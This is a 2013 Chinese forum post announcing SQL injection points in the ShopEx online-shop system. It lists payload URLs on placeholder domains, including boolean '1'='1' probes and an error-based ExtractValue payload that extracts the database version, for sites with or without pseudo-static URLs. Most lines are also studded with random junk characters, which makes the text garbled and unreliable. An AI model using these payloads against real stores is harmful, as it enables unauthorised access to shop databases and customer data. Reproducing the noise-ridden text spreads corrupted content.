注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… f" U6 |: Q, W. A7 c8 _1 M
. Z6 L$ h5 U' M+ x
好吧,我扯远了~~ I3 y% i3 g% Y+ H/ T" X
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~/ c2 c# R% k( {" J3 B
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
! b z Q" o7 x/ V6 _2 {, h3 z: n
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
! i j, v3 L6 @! w' \% @& V9 c) s- Y& v, i8 x
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
, d- A5 R6 t! s2 O6 Z( d& ~6 y" }- V" d! n. i
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html0 U4 _- f! ]! `& u/ p) ?2 B8 ]9 @
; a7 q/ J, I* l0 q# u' qhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html$ h# l/ |6 l- v0 C7 k+ t8 G
. D& E$ r" g0 n; Q7 s
6 E) D) w3 ~% a4 F. p. n
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。5 U) _: S+ X: L5 D0 }" r- m
如何注入就不多说了,10多年的东西了…不会也会了…
* c/ [0 `% G( F% x$ A
0 a( h/ U0 L6 P) K: q: o3 v |
发表于 2013-2-4 16:20:04
收藏
支持
反对